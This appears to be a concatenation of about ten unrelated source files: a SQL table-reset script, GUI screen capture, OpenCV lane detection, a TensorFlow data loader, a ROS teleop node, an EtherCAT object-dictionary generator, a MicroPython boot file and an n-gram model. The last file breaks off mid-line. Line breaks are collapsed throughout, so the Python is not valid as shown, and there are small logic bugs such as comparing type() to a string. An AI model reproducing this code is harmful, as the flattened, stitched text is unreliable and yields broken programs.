delete from ces_policies ; delete from ces_policy_identity ; delete from host_policies ; delete from host_policy_identity ; delete from host_ids ; delete from firewall_policies ; delete from host_policy_ts ; ALTER TABLE ces_policies AUTO_INCREMENT = 1; ALTER TABLE ces_policy_identity AUTO_INCREMENT = 1; ALTER TABLE host_policies AUTO_INCREMENT = 1; ALTER TABLE host_policy_identity AUTO_INCREMENT = 1; ALTER TABLE host_ids AUTO_INCREMENT = 1; ALTER TABLE firewall_policies AUTO_INCREMENT = 1; ALTER TABLE host_policy_ts AUTO_INCREMENT = 1; use ces_bootstrap; delete from bootstrap; ALTER TABLE bootstrap AUTO_INCREMENT = 1;
import time import pyautogui import subprocess import re def xwininfo_output(name): output = subprocess.run(["xwininfo", "-name", name], stdout=subprocess.PIPE).stdout output = output.decode('ascii') return output def extract_dims(output): mo = re.search(' Absolute upper-left X: (\d+)', output) x = int(mo.group(1)) mo = re.search(' Absolute upper-left Y: (\d+)', output) y = int(mo.group(1)) mo = re.search(' Width: (\d+)', output) w = int(mo.group(1)) mo = re.search(' Height: (\d+)', output) h = int(mo.group(1)) return x, y, w, h def get_xwin_dims(name): output = xwininfo_output(name) return extract_dims(output) def capture_window(x, y, w, h, h_nc): im = pyautogui.screenshot(region=(x, y + h_nc, w, h - h_nc)) return im if __name__ == '__main__': time.sleep(5) x, y, w, h = get_xwin_dims('Freecell') # x, y, w, h = get_xwin_dims('Sudoku') print(x, y, w, h) # pyautogui.mouseDown(1360, 670) # pyautogui.moveTo(1360, 670) # pyautogui.dragTo(220, 330, duration=0.5) # pyautogui.mouseUp(220, 330, duration=0.5) # where = pyautogui.locateOnScreen('/home/splendor/Pictures/freecell-new.png') # print(where) # where = pyautogui.center(where) # print(where) # pyautogui.click(where) # pyautogui.click() # distance = 200 # while distance > 0: # pyautogui.dragRel(distance, 0, duration=0.2) # distance = distance - 5 # pyautogui.dragRel(0, distance, duration=0.2) # pyautogui.dragRel(-distance, 0, duration=0.2) # distance = distance - 5 # pyautogui.dragRel(0, -distance, duration=0.2) # print('Press Ctrl-C to quit.') # try: # while True: # x, y = pyautogui.position() # positionStr = 'X: ' + str(x).rjust(4) + ' Y: ' + str(y).rjust(4) # print(positionStr, end='') # print('\b' * len(positionStr), end='', flush=True) # except KeyboardInterrupt: # print('\nDone.')
import matplotlib.pylab as plt import cv2 import numpy as np import math def region_of_interest(img, vertices): mask = np.zeros_like(img) #channel_count = img.shape[2] match_mask_color = 255 cv2.fillPoly(mask, vertices, match_mask_color) masked_image = cv2.bitwise_and(img, mask) return masked_image def mediumVal(spot): result = [] for i in range(4): spots = [] for line in spot: spots.append(line[i]) array = np.array(spots) if math.isnan(array.mean()): return True else: result.append(int(array.mean())) return result def draw_the_lines(img, lines, width): if type(lines) == 'NoneType': return img img = np.copy(img) blank_image = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8) left_spot = [] right_spot = [] for line in lines: for x1, y1, x2, y2 in line: if x1 < width / 2: left_spot.append((x1, y1, x2, y2)) else: right_spot.append((x1, y1, x2, y2)) left_line = mediumVal(left_spot) right_line = mediumVal(right_spot) slope = [] if left_line != True: x1, y1, x2, y2 = left_line if x2 - x1 != 0: slope.append((y2 - y1) / (x2 - x1)) cv2.line(blank_image, (x1, y1), (x2, y2), (0, 255, 0), thickness=10) if right_line != True: x1, y1, x2, y2 = right_line if x2 - x1 != 0: slope.append((y2 - y1) / (x2 - x1)) cv2.line(blank_image, (x1, y1), (x2, y2), (0, 255, 0), thickness=10) text = "Go Straight" if slope[0] > 0: text = "Right" elif slope[0] < 0: text = "Left" org = (50, 100) font = cv2.FONT_HERSHEY_SIMPLEX cv2.putText(img, text, org, font, 1, (255, 0, 0), 2) img = cv2.addWeighted(img, 0.8, blank_image, 1, 0.0) return img # = cv2.imread('road.jpg') #image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) def process(image): height = image.shape[0] width = image.shape[1] region_of_interest_vertices = [(0, height), (0, height / 2), (width, height / 2), (width, height)] gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) canny_image = cv2.Canny(gray_image, 50, 150) cropped_image = region_of_interest( canny_image, np.array([region_of_interest_vertices], np.int32), ) lines = cv2.HoughLinesP( cropped_image, #smaller rho/theta=more accurate longer processing time rho=6, #number of pixels theta=np.pi / 60, threshold=160, lines=np.array([]), minLineLength=40, maxLineGap=25) if type(lines) == "NoneType" or lines is None: return image image_with_lines = draw_the_lines(image, lines, width) return image_with_lines cap = cv2.VideoCapture(1) while True: ret, frame = cap.read() if ret: frame = process(frame) cv2.imshow('frame', frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: break cap.release() cv2.destroyAllWindows()
import numpy as np import tensorflow as tf from random import choice,shuffle #g_ps = [] #s_ps = [] #for g in glob.glob('../data/training_set/ffp10_p/*.npy'): # g_ps.append(np.load(g)) #g_ps = np.array(g_ps) #print 'g_ps.shape:',g_ps.shape #for s in glob.glob('../data/training_set/string_p/*.npy'): # s_ps.append(np.load(s)) #s_ps = np.array(s_ps) #print 's_ps.shape:' , s_ps.shape #def dp(n): # l = 200 # x = [] # y = [] # for i in range(n): # gm = np.random.uniform(10,1000) # gm = gm* 1e-7 # # r1 = np.random.randint(0,len(g_ps)) # ri,rj = np.random.randint(0,2048-l,2) # r2 = np.random.randint(0,len(s_ps)) # ri,rj = np.random.randint(0,2048-l,2) # # gp = g_ps[r1][ri:ri+l,rj:rj+l] # sp = s_ps[r2][ri:ri+l,rj:rj+l] # x.append(gp+gm*sp) # y.append(-np.log(gm)) # return np.expand_dims(np.array(x) , -1) , np.expand_dims(np.array(y) , -1) def get_slice(data,nx,ny): """Slice matrix in x and y direction""" lx,ly = data.shape if nx==0 or nx==lx: slx = slice(0, lx) else: idx = np.random.randint(0, lx - nx) slx = slice(idx, (idx+nx)) if ny==0 or ny==ly: sly = slice(0, ly) else: idy = np.random.randint(0, ly - ny) sly = slice(idy, (idy+ny)) return slx, sly class DataProvider(object): def __init__(self,n_files,s_files,gmus, nx=0,ny=0,n_buffer=10, reload_rate=100,filt=None): self.n_files = n_files self.s_files = s_files nmin = min(len(n_files),len(s_files)) if n_buffer>= nmin: n_buffer = nmin self.reload_rate = 0 else: self.reload_rate = reload_rate self.nx,self.ny = nx,ny self.n_buffer = n_buffer self.gmus = gmus if filt is None: def filt(x): return x self.filt = filt self.counter = 0 self.reload() def reload(self): print('Data provider is reloading...') self.n_set = [] self.s_set = [] # self.d_set = [] ninds = np.arange(len(self.n_files)) sinds = np.arange(len(self.s_files)) shuffle(ninds) shuffle(sinds) for i in range(self.n_buffer): filen = self.n_files[ninds[i]] files = self.s_files[sinds[i]] self.n_set.append(np.load(filen)) signal = np.load(files) self.s_set.append(signal) # if self.filt: # self.d_set.append(self.filt(signal)) # else: # self.d_set.append(signal) # def get_data(self): self.counter += 1 if self.reload_rate: if self.counter%self.reload_rate==0: self.reload() n = choice(self.n_set) sind = choice(np.arange(self.n_buffer)) s = self.s_set[sind] # d = self.d_set[sind] return n,s#,d def pre_process(self, n, s, gmu): nslice = get_slice(n,self.nx,self.ny) n = n[nslice] sslice = get_slice(s,self.nx,self.ny) s = s[sslice] sn = n + gmu*s sn = self.filt(sn) # d = d[sslice] sn = np.expand_dims(sn,-1) # d = np.expand_dims(d,-1) return sn#,d def __call__(self, n, gmus=None): if gmus is None: gmus = self.gmus n_class = len(gmus) # x,y = self.get_data() X = [] Y = [] for i in range(n): n,s = self.get_data() inds = np.arange(n_class) shuffle(inds) gmu = gmus[inds[0]] # gmu = choice(gmus) sn = self.pre_process(n,s,gmu) # rand = np.random.randint(0,2) # sn = sn-sn+rand X.append(sn) # Y.append(-np.log10(gmu+1e-30)) lbl = n_class*[0] lbl[inds[0]] = 1 Y.append(lbl) X = np.array(X) Y = np.array(Y) # def __call__(self, n, gmus=None): # rp = np.random.uniform(0,1) # # if gmus is None: # gmus = self.gmus ## x,y = self.get_data() # X = [] # Y = [] # for i in range(n): # n,s = self.get_data() # gmu = choice(gmus) # sn = self.pre_process(n,s,gmu) # rand = int(np.random.uniform(0,1)>rp) # sn = sn-sn+rand # X.append(sn) ## Y.append(-np.log10(gmu+1e-30)) # lbl = [0,0] # lbl[rand] = 1 # Y.append(lbl) # # X = np.array(X) # Y = np.array(Y) return X,Y #fig,ax=plt.subplots(1,1,figsize=(5,5)) #ax.imshow(x[0,:,:,0],norm=LogNorm(),cmap=plt.get_cmap('jet')) #plt.title('G + Gu*S') #plt.savefig('x_lognorm ') #fig,ax=plt.subplots(1,1,figsize=(5,5)) #ax.imshow(x[0,:,:,0]) #plt.title('G + Gu*S') #plt.savefig('x') #print(x.shape,y.shape) #exit() #l = 200 #nx,ny,n_channel = l,l,1 def arch_t(x_in): print("\033[91m ============== Begin ============== \033[0m") x1 = tf.layers.conv2d(x_in,filters=36,kernel_size=3, strides=(1, 1),padding='same',activation=tf.nn.relu) print(x1) x2 = tf.layers.average_pooling2d(x1,pool_size=2,strides=2) print(x2) x2 = tf.layers.conv2d(x2,filters=36,kernel_size=3, strides=(2, 2),padding='same',activation=tf.nn.relu) print(x2) x3 = tf.layers.average_pooling2d(x2,pool_size=2,strides=2) print(x3) x3 = tf.layers.conv2d(x3,filters=36,kernel_size=3, strides=(2, 2),padding='same',activation=tf.nn.relu) print(x3) x4 = tf.layers.average_pooling2d(x3,pool_size=3,strides=2) print(x4) x4 = tf.layers.conv2d(x4,filters=36,kernel_size=3,strides=(2, 2),padding='same', activation=tf.nn.relu) print(x4) #x5 = tf.layers.average_pooling2d(x4,pool_size=2,strides=2) x5 = tf.layers.conv2d(x4,filters=36,kernel_size=3,strides=(2, 2),padding='same', activation=tf.nn.relu) print(x5) #x5 = tf.layers.average_pooling2d(x5,pool_size=2,strides=2) #x5 = tf.layers.conv2d(x5,filters=36,kernel_size=3,strides=(2, 2),padding='same', #activation=tf.nn.relu) #x5 = tf.layers.average_pooling2d(x5,pool_size=2,strides=2) x7 = tf.contrib.layers.flatten(x5) x7 = tf.nn.dropout( x7, keep_prob=0.6) print(x7) x7 = tf.layers.dense(x7, 10 , activation=tf.nn.relu) print(x7) y_out = tf.layers.dense(x7, 1 , activation=tf.nn.relu) print(y_out) print("\033[91m =============== END =============== \033[0m") return y_out def arch_maker(x,n_conv,n_class): #x_in = tf.placeholder(tf.float32,[None,nx,ny,n_channel]) #y_true = tf.placeholder(tf.float32,[None , n_channel]) #learning_rate = tf.placeholder(tf.float32) print("\033[91m ============== Begin ============== \033[0m") # for _ in range(n_conv): # x = tf.layers.conv2d(x,filters=16,kernel_size=5, # strides=(1, 1),padding='same') # print(x) # x = tf.layers.batch_normalization(x) # print(x) # x = tf.nn.relu(x) # print(x) for _ in range(n_conv): x = tf.layers.conv2d(x,filters=4,kernel_size=3, strides=(1, 1),padding='same') print(x) x = tf.layers.batch_normalization(x) print(x) x = tf.nn.relu(x) print(x) x = tf.layers.average_pooling2d(x,pool_size=2,strides=2) print(x) x = tf.contrib.layers.flatten(x) print(x) x = tf.nn.dropout( x, keep_prob=0.6) print(x) x = tf.layers.dense(x, 20 , activation=tf.nn.relu) print(x) #x = tf.layers.dense(x, 20 , activation=tf.nn.softmax) #print(x) y = tf.layers.dense(x, n_class, activation=tf.nn.softmax) print(y) print("\033[91m =============== END =============== \033[0m") return y
# -*- coding: utf-8 -*- """ Created on Mon Jun 24 20:59:54 2019 @author: TRAORE Cheick Amed """ #import time import FACTORISATION as ft #from prime import erastothene #d=time.time() def maillage(Nl,Nc): tab,tabool=[],[] tabool+=[ft.erastothene(Nl)] if tabool[0]: tab+=[ft.factorisation(Nl-1)] else: tab+=[ft.factorisation(Nl)] tabool+=[ft.erastothene(Nc)] if tabool[1]: tab+=[ft.factorisation(Nc-1)] else: tab+=[ft.factorisation(Nc)] return tab,tabool #f=time.time() #print('temps {}'.format(f-d)) #print('temp ',f-d)
class Solution(object): def trap(self, height): """ :type height: List[int] :rtype: int """ # ## normal way # res=0 # # From left to right assuming there exists a higher or same level. Keep the water in temp until we verify that. # t=0 # i=0 # j=0 # while j<len(height): # if height[j]<height[i]: # t+=height[i]-height[j] # else: # res+=t # t=0 # i=j # j+=1 # # Now i indicates the highest bar. We inverse the remaining part of the bars and do the same thing. # height=height[i:][::-1] # t=0 # i=0 # j=0 # while j<len(height): # if height[j]<height[i]: # t+=height[i]-height[j] # else: # res+=t # t=0 # i=j # j+=1 # return res ## another way if not height: return 0 i=0 j=len(height)-1 # between i and j, we can trap min(height[i],height[j])*(j-i+1) of water. Then we remove the brick of the lower one and meanwhile decrease the volume of water by lower, until we find a higher brick. Then the trapped water could increase by (min(height[i],height[j])-lower)*(j-i+1). Update lower, and repeat until i>j. res=0 lower=0 while i<=j: h=min(height[i],height[j]) if h>lower: lower=h if height[i]<=height[j]: res+=lower-height[i] i+=1 else: res+=lower-height[j] j-=1 return res
#!/usr/bin/env python # simple tele operation that translates key presses, e.g. 'w' # to motorhat node messages. does simple interpolation ramp up # of change between current value and target value. #import readchar import sys, select, tty, termios import rospy from std_msgs.msg import Int16MultiArray import numpy as np # setup a ros publisher and a method to send msgs to it. publisher = rospy.Publisher('/robotZero/hat_cmd', Int16MultiArray, queue_size=1, latch=True) rospy.init_node("teleop") def pub(values): values = [-v for v in values] # hack rospy.loginfo("publish [%s]" % values) msg = Int16MultiArray() msg.data = values publisher.publish(msg) # set cbreak on stdin (recall original attr to restore later) # this is required for the polling select on stdin. original_t_attr = termios.tcgetattr(sys.stdin) tty.setcbreak(sys.stdin.fileno()) rate = rospy.Rate(1) while not rospy.is_shutdown(): d = np.random.randint(0, 7, size=4) d -= 3 d *= 50 pub(d) # spin ros rate.sleep() # pub stop and restore terminal settings pub([0]*4) termios.tcsetattr(sys.stdin, termios.TCSADRAIN, original_t_attr)
from PDOMapping import GeneratePdoMapping def GeneratePdoMappingString(listSlaveInfo,rxtx,strEntryPrefix,strPdoObjPrefix): dictPdoMapping = GeneratePdoMapping(listSlaveInfo,rxtx,strEntryPrefix,strPdoObjPrefix) strPdoMapping = "" strAppObjDic = "" #Generate PDO Mapping Object for itemPdoMapping in dictPdoMapping.iteritems(): #Generate Remark strRemark = "/****************************************************\n" strRemark = strRemark+"** Object"+itemPdoMapping[0]+'\n' strRemark = strRemark+"****************************************************/\n" #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+itemPdoMapping[0] strEntryDesc = strEntryDesc+'[] = {\n' strEntryDesc = strEntryDesc+'\t{DEFTYPE_UNSIGNED16, 0x10, ACCESS_READ },\n' strEntryDesc = strEntryDesc+'\t{DEFTYPE_UNSIGNED32, 0x20, ACCESS_READ},\n'*len(itemPdoMapping[1]) strEntryDesc = strEntryDesc+'};' #Generate Obj name if rxtx == "rx": strObjName = 'OBJCONST UCHAR OBJMEM aName'+itemPdoMapping[0]+'[] = "Output Mapping ' elif rxtx == "tx": strObjName = 'OBJCONST UCHAR OBJMEM aName'+itemPdoMapping[0]+'[] = "Input Mapping ' strObjName = strObjName+itemPdoMapping[0][4:6] strObjName = strObjName+'\\000\\377";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\tUINT16 u16SubIndex0;\n" strVarDecl = strVarDecl+"\tUINT32 aEntries["+str(len(itemPdoMapping[1]))+"];\n" strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+itemPdoMapping[0]+';\n' strVarDecl = strVarDecl+"TOBJ"+itemPdoMapping[0]+" Obj"+itemPdoMapping[0]+' __attribute__ ((aligned (2)))\n={' strVarDecl = strVarDecl+str(len(itemPdoMapping[1]))+', {' for dictEntry in itemPdoMapping[1]: strVarDecl = strVarDecl+str(dictEntry['Index'])+("%02d"%dictEntry['SI'])+\ ("%02x"%dictEntry['Length'])+',' strVarDecl = strVarDecl+'}};' strPdoMapping = strPdoMapping+strRemark+strVarDecl+'\n'+strEntryDesc+'\n'+strObjName+'\n' #Generate AppObjDic of PDO mapping strAppObjDic = strAppObjDic+"\t{NULL,NULL,"+itemPdoMapping[0] strAppObjDic = strAppObjDic+",{DEFTYPE_PDOMAPPING, 1 | (OBJCODE_ARR << 8)}, asEntryDesc" strAppObjDic = strAppObjDic+itemPdoMapping[0]+', aName'+itemPdoMapping[0]+', &Obj'+itemPdoMapping[0] strAppObjDic = strAppObjDic+', NULL, NULL, 0x0000 },\n' #Generate PDO Assignment #Generate Remark strRemark = "/****************************************************\n" if rxtx == "rx": strRemark = strRemark+"** Object0x1C12\n" elif rxtx == "tx": strRemark = strRemark+"** Object0x1C13\n" strRemark = strRemark+"****************************************************/\n" #Generate Obj name if rxtx == "rx": strPdoAssignIndex = '0x1C12' strPdoAssignVarName = 'sRxPDOassign' elif rxtx == "tx": strPdoAssignIndex = '0x1C13' strPdoAssignVarName = 'sTxPDOassign' strObjName = 'OBJCONST UCHAR OBJMEM aName'+strPdoAssignIndex+'[] = "'+rxtx.upper()+'PDO assign";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\tUINT16 u16SubIndex0;\n" strVarDecl = strVarDecl+"\tUINT16 aEntries["+str(len(dictPdoMapping))+"];\n" strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+strPdoAssignIndex+';\n' strVarDecl = strVarDecl+"TOBJ"+strPdoAssignIndex+' '+strPdoAssignVarName+' __attribute__ ((aligned (2))) \n={' strVarDecl = strVarDecl+str(len(dictPdoMapping))+', {' strVarDecl = strVarDecl+','.join(dictPdoMapping.keys()) strVarDecl = strVarDecl+'}};' strPdoMapping = strPdoMapping+strRemark+strVarDecl+'\n'+strObjName+'\n' #Generate AppObjDic of PDO assignment strAppObjDic = strAppObjDic+"\t{NULL,NULL,"+strPdoAssignIndex strAppObjDic = strAppObjDic+",{DEFTYPE_UNSIGNED16, "+str(len(dictPdoMapping)) strAppObjDic = strAppObjDic+" | (OBJCODE_ARR << 8)}, asPDOAssignEntryDesc" strAppObjDic = strAppObjDic+', aName'+strPdoAssignIndex+', &'+strPdoAssignVarName strAppObjDic = strAppObjDic+', NULL, NULL, 0x0000 },\n' return (strPdoMapping,strAppObjDic) def GenerateTxPdoMappingString(listSlaveInfo): return GeneratePdoMappingString(listSlaveInfo,"tx","0x6","0x1A") def GenerateRxPdoMappingString(listSlaveInfo): return GeneratePdoMappingString(listSlaveInfo,"rx","0x7","0x16") def ODGenerator(listSlaveInfo): from EthercatType import dictEthercatType, dictAccessType, dictPdoDirType strDecl = "" #Generate PdoMappingString (strDeclTxPdo,strAppObjDicTxPdo) = GenerateTxPdoMappingString(listSlaveInfo); (strDeclRxPdo,strAppObjDicRxPdo) = GenerateRxPdoMappingString(listSlaveInfo); strDecl = strDecl+strDeclRxPdo; strDecl = strDecl+strDeclTxPdo; strAppObjDic = "\n/****************************************************\n" strAppObjDic = strAppObjDic+"** ApplicationObjDic\n" strAppObjDic = strAppObjDic+"****************************************************/\n" strAppObjDic = strAppObjDic+"TOBJECT OBJMEM ApplicationObjDic[] = {\n" strAppObjDic = strAppObjDic+strAppObjDicTxPdo strAppObjDic = strAppObjDic+strAppObjDicRxPdo for dictItem in listSlaveInfo: if dictItem['ObjectCode'] == "VARIABLE": dictEntry = dictItem['Entry'][0] #Generate var declaration strVarDecl = dictEthercatType[dictEntry['DataType']][0] strVarDecl = strVarDecl+' '+"Obj"+dictItem['Index']+' __attribute__ ((aligned (2)))= ' strVarDecl = strVarDecl+str(dictEntry['Default'])+';' #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index']+ ' = {' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "'+dictEntry['Name']+'";' elif dictItem['ObjectCode'] == "RECORD": #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index'] strEntryDesc = strEntryDesc+'['+str(len(dictItem['Entry']))+'] = {\n' for dictEntry in dictItem['Entry']: strEntryDesc = strEntryDesc+'\t{' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'},\n' strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "' for dictEntry in dictItem['Entry']: strObjName = strObjName+dictEntry['Name']+'\\000' strObjName = strObjName+'\\377";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" bLastBitField = 0 for dictEntry in dictItem['Entry']: strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictEntry['DataType']][0] strVarDecl = strVarDecl+' '+"SubIndex"+str(dictEntry['SI']) if dictEthercatType[dictEntry['DataType']][2]<16: strVarDecl = strVarDecl+':'+str(dictEthercatType[dictEntry['DataType']][2]) if bLastBitField == 0: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' bLastBitField = 1 else: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' bLastBitField = 0 strVarDecl = strVarDecl+';\n' strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+';\n' strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+" Obj"+dictItem['Index']+'\n={' for dictEntry in dictItem['Entry']: strVarDecl = strVarDecl+str(dictEntry['Default'])+',' strVarDecl = strVarDecl+'};' elif dictItem['ObjectCode'] == "ARRAY": #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index'] strEntryDesc = strEntryDesc+'['+str(len(dictItem['Entry']))+'] = {\n' for dictEntry in dictItem['Entry']: strEntryDesc = strEntryDesc+'\t{' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'},\n' strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "' strObjName = strObjName+dictItem['Entry'][0]['Name']+'";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictItem['Entry'][0]['DataType']][0] strVarDecl = strVarDecl+' '+"SubIndex0"+' __attribute__ ((aligned (2)));\n' for intSI in range(1,int(dictItem['Entry'][0]['Default'])+1): strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictItem['Entry'][1]['DataType']][0]\ +' '+"SubIndex"+str(intSI) if dictEthercatType[dictItem['Entry'][1]['DataType']][2]<16: strVarDecl = strVarDecl+':'+str(dictEthercatType[dictItem['Entry'][1]['DataType']][2]) if intSI==1 or dictEthercatType[dictItem['Entry'][1]['DataType']][2]>=16: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' strVarDecl = strVarDecl+';\n' strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+';\n' strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+" Obj"+dictItem['Index']+'\n={' strVarDecl = strVarDecl+str(dictItem['Entry'][0]['Default'])+',' strVarDecl = strVarDecl+(str(dictItem['Entry'][1]['Default'])+',')*int(dictItem['Entry'][0]['Default']) strVarDecl = strVarDecl+'};' #Generate Remark strRemark = "/****************************************************\n" strRemark = strRemark+"** Object"+dictItem['Index']+'\n' strRemark = strRemark+"****************************************************/\n" strEntry = strRemark+strVarDecl+'\n'+strEntryDesc+'\n'+strObjName+'\n' #Append to declaration string strDecl = strDecl+strEntry #Generate ApplicationObjDic Item strObjDicItem = "\t{NULL, NULL, "+dictItem['Index']+', ' if dictItem['ObjectCode'] == "VARIABLE": strObjDicItem = strObjDicItem+'{'+dictEthercatType[dictItem['Entry'][0]['DataType']][1] strObjDicItem = strObjDicItem+', 0|(OBJCODE_VAR<<8)}, '+'&' elif dictItem['ObjectCode'] == "RECORD": strObjDicItem = strObjDicItem+'{DEFTYPE_RECORD' strObjDicItem = strObjDicItem+', '+str(len(dictItem['Entry'])-1)+'|(OBJCODE_REC<<8)}, ' elif dictItem['ObjectCode'] == "ARRAY": strObjDicItem = strObjDicItem+'{DEFTYPE_RECORD' strObjDicItem = strObjDicItem+', '+str(dictItem['Entry'][0]['Default'])+'|(OBJCODE_ARR<<8)}, ' strObjDicItem = strObjDicItem+'asEntryDesc'+dictItem['Index']+', ' strObjDicItem = strObjDicItem+'aName'+dictItem['Index']+', ' strObjDicItem = strObjDicItem+'&Obj'+dictItem['Index']+', ' strObjDicItem = strObjDicItem+'NULL , NULL , 0x0000 },\n' strAppObjDic = strAppObjDic+strObjDicItem strAppObjDic = strAppObjDic+"\t{NULL,NULL, 0xFFFF, {0, 0}, NULL, NULL, NULL, NULL}};\n" return strDecl+strAppObjDic
# This file is executed on every boot (including wake-boot from deepsleep) #import esp #esp.osdebug(None) import gc import webrepl import network from config import ESSID, PASSWORD webrepl.start() gc.collect() def connect(): sta_if = network.WLAN(network.STA_IF) if not sta_if.isconnected(): print('Connecting to network...') sta_if.active(True) sta_if.connect(ESSID, PASSWORD) while not sta_if.isconnected(): pass print('Network config:', sta_if.ifconfig()) connect()
from nltk.tokenize import RegexpTokenizer from nltk.tokenize import word_tokenize from nltk.corpus import stopwords from nltk.tokenize import RegexpTokenizer from collections import Counter import pickle import os task = [ '20_newsgroups/rec.sport.baseball', '20_newsgroups/rec.motorcycles' ] def fetchFromPickle(pickleFile): file = open(pickleFile,'rb') pickleData = pickle.load(file) file.close() return pickleData def saveInPickle(data, pickleFile): file = open(pickleFile,"wb") pickle.dump(data,file) file.close() def generateTrigramProb(trigramFreq, bigramFreq, ksmooth,vocSize): for w1 in trigramFreq: for w2 in trigramFreq[w1]: for w3 in trigramFreq[w1][w2]: trigramFreq[w1][w2][w3]=float(trigramFreq[w1][w2][w3]+ksmooth)/float(bigramFreq[w1][w2]+ksmooth*vocSize) return trigramFreq def generateBigramProb(bigramFreq, unigramFreq, ksmooth,vocSize): for w1 in bigramFreq: for w2 in bigramFreq[w1]: bigramFreq[w1][w2]=float(bigramFreq[w1][w2]+ksmooth)/float(unigramFreq[w1]+ksmooth*vocSize) return bigramFreq def generateUnigramProb(unigramFreq, totalFreq, ksmooth,vocSize): for w1 in unigramFreq: unigramFreq[w1] = float(unigramFreq[w1]+ksmooth)/float(totalFreq+vocSize*ksmooth) return unigramFreq def generateUnigram(data): dict = {} for word in data: dict[word] = 0 for word in data: dict[word]+=1 return dict def generateBigram(data): dix = {} for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]] = {} # print(data[i-1]) # print(dix) # print(dix) for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]][data[i+1]] = 0 for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]][data[i+1]]+=1 # dict[data[i]][data[i+1]]+=1 return dix def generateTrigram(data): dix = {} for i, val in enumerate(data): dix[data[i]] = {} # print(data[i-1]) # print(dix) # print(dix) for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]] = {} for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]][data[i+2]] = 0 for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]][data[i+2]]+=1 # dict[data[i]][data[i+1]]+=1 return dix def removeStopWords(words): filteredWords = [] stop_words=stopwords.words('english') for word in words: if word not in stop_words: filteredWords.append(word) return filteredWords def processDataSet(path): files=[] for r, d, f in os.walk(path): for file in f: files.append(os.path.join(r, file)) data = [] for file in files: file = open(file, "r", encoding = "ISO-8859-1") fileContent=file.read() fileContent=fileContent.lower() if (fileContent.find("lines:") != -1): metadata,fileContent = fileContent.split('lines:', 1) tokenizer=RegexpTokenizer(r'([A-Za-z0-9]+)') dataList=tokenizer.tokenize(fileContent) # print(dataList) data=data+dataList # print(data) return data count = 1 ksmooth = 1 for path in task: list = processDataSet(path) # list = removeStopWords(list) # print(len(list)) unigramFreq = generateUnigram(list) saveInPickle(unigramFreq, "task-"+str(count)+"-unigram-freq.pickle") bigramFreq=generateBigram(list) saveInPickle(bigramFreq, "task-"+str(count)+"-bigram-freq.pickle") trigramFreq=generateTrigram(list) saveInPickle(trigramFreq, "task-"+str(count)+"-trigram-freq.pickle") totalFreq = len(list) vocSize = len(unigramFreq) trigramProb = generateTrigramProb(trigramFreq, bigramFreq, ksmooth, vocSize) saveInPickle(trigramProb, "add-1-task-"+str(count)+"-trigram.pickle") bigramProb = generateBigramProb(bigramFreq, unigramFreq, ksmooth, vocSize) saveInPickle(bigramProb, "add-1-task-"+str(count)+"-bigram.pickle") unigramProb = generateUnigramProb(unigramFreq, totalFreq, ksmooth, vocSize) saveInPickle(unigramProb, 